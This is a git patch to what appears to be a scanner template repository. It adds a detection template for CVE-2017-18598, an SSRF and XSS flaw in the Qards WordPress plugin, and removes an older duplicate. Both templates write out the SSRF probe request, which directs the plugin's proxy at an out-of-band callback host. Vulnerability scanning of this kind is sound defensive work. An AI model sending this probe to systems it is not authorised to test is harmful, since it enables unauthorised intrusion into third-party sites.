From fd7ac70096523c99c24c34f440a3ceaea75585df Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Sun, 27 Feb 2022 16:25:03 +0530
Subject: [PATCH] misc updates

---
 cves/2017/CVE-2017-18598.yaml             | 29 +++++++++++++++++++++++
 vulnerabilities/wordpress/qards-ssrf.yaml | 17 -------------
 2 files changed, 29 insertions(+), 17 deletions(-)
 create mode 100644 cves/2017/CVE-2017-18598.yaml
 delete mode 100644 vulnerabilities/wordpress/qards-ssrf.yaml

diff --git a/cves/2017/CVE-2017-18598.yaml b/cves/2017/CVE-2017-18598.yaml
new file mode 100644
index 0000000000..8506fa3956
--- /dev/null
+++ b/cves/2017/CVE-2017-18598.yaml
@@ -0,0 +1,29 @@
+id: CVE-2017-18598
+
+info:
+  name: Qards Plugin - Stored XSS and SSRF
+  author: pussycat0x
+  severity: medium
+  description: The Qards plugin through 2017-10-11 for WordPress has XSS via a remote document specified in the url parameter to html2canvasproxy.php
+  reference:
+    - https://wpscan.com/vulnerability/8934
+    - https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-18598
+  tags: cve,cve2017,wordpress,ssrf,xss,wp-plugin,oast
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "console.log"
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/qards-ssrf.yaml b/vulnerabilities/wordpress/qards-ssrf.yaml
deleted file mode 100644
index 4518dad447..0000000000
--- a/vulnerabilities/wordpress/qards-ssrf.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: qards-ssrf
-info:
-  name: Qards - Server Side Request Forgery
-  author: pussycat0x
-  severity: medium
-  description: Qards provides you easy option to drag and edit every part and element of your site in the front-end, you will never have to write any code to change the layout or to change any part of the site like the traditional WordPress way.
-  reference: https://wpscan.com/vulnerability/454a0ce3-ecfe-47fc-a282-5caa51370645
-  tags: wordpress,ssrf
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}/'
-    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"